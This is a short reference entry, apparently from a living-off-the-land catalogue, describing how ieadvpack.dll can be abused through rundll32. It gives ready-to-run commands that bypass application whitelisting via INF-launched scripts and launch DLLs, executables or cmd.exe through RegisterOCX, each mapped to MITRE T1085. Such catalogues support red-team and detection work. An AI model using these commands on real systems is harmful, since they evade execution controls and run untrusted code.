.. / Ieadvpack.dll
Star

INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.


Paths:


Resources:
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
https://twitter.com/pabraeken/status/991695411902599168
https://twitter.com/0rbz_/status/974472392012689408

Acknowledgement:
Jimmy (LaunchINFSection) - @bohops
Fabrizio (RegisterOCX - DLL) - @0rbz_
Pierre-Alexandre Braeken (RegisterOCX - CMD) - @pabraeken


Detection:



AWL bypass

Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
Usecase:
Privileges required:User
OS:Windows
Mitre:T1085



Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
Usecase:
Privileges required:User
OS:Windows
Mitre:T1085



Execute

Launch a DLL payload by calling the RegisterOCX function.
rundll32.exe ieadvpack.dll,RegisterOCX test.dll
Usecase:
Privileges required:User
OS:Windows
Mitre:T1085



Launch an executable by calling the RegisterOCX function.
rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Usecase:
Privileges required:User
OS:
Mitre:T1085



Launch command line by calling the RegisterOCX function.
rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Usecase:
Privileges required:User
OS:
Mitre:T1085